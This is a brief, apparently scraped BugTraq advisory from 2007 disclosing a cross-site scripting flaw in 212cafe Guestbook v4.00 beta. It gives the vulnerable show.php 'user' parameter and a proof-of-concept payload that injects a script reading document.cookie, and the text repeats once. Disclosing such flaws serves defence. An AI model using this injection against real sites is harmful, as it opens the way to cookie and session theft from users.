BugTraq
Back to list
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
XSS in Guestbook ( v.4.00 beta )
Jan 21 2007 01:16AM
xx_hack_xx_2004 hotmail com
Hello
Vulnerable : Guestbook ( By 212cafe.com )
Version: v.4.00 beta
Web : http://www.212cafe.com
Exploit :
http://www.example.com/guestbookv4.0/show.php?user=[XSS]
Example :
http://www.example.com/guestbookv4.0/show.php?user='><script>alert(docum
ent.cookie);</script>
-----
Discoverey By Li...
[ more ]
Privacy Statement
Copyright 2010, SecurityFocus
Vulnerable : Guestbook ( By 212cafe.com )
Version: v.4.00 beta
Web : http://www.212cafe.com
Exploit :
http://www.example.com/guestbookv4.0/show.php?user=[XSS]
Example :
http://www.example.com/guestbookv4.0/show.php?user='><script>alert(docum
ent.cookie);</script>
-----
Discoverey By Li...
[ more ]